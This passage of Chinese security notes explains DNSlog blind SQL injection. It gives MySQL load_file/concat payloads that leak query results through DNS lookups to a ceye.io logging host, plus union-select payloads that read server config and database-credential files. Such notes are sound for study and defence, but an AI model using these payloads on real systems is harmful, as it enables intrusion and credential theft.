攻击者首先提交注入语句select load_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io\abc进行拼接,构成一个新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果的域名就被提交到DNS服务器进行解析,DNS服务器上的Dnslog就可以得到SQL注入结果,注入语句中的ceye.io,是一个开放的Dnslog平台,我们可以从平台获取到有关ceye.io的DNS查询信息
总结: Dnslog盲注就是利用load-file()函数发起请求,使用Dnslog接受请求,获取数据的一种攻击方法
核心语法: select load_file(concat(’\\’,(select database()),’.XXX.ceye.io\abc’) 通过对 “selecct databse()” 这一部分语句的构造,就能实现有回显的SQL注入。
转载:https://www.jianshu.com/p/d6788f57dba5
load_file()介绍
读/etc/init.d下的东西,这里有配置文件路径
?id=1' union select 1,2,load_file('/etc/init.d/httpd')得到web安装路径
?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')读取密码文件
?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')转载:https://www.jianshu.com/p/4de3e2677601
利用编码问题,进行攻击的一种方式,注入语句中的